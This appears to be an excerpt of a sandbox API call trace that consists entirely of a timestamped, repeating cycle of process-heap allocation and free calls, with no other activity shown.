[0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.424] GetProcessHeap () returned 0x280000 [0058.424] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.425] GetProcessHeap () returned 0x280000 [0058.425] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.426] GetProcessHeap () returned 0x280000 [0058.426] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.427] GetProcessHeap () returned 0x280000 [0058.427] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.428] GetProcessHeap () returned 0x280000 [0058.428] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.429] GetProcessHeap () returned 0x280000 [0058.429] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.430] GetProcessHeap () returned 0x280000 [0058.430] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.430] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.431] GetProcessHeap () returned 0x280000 [0058.431] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 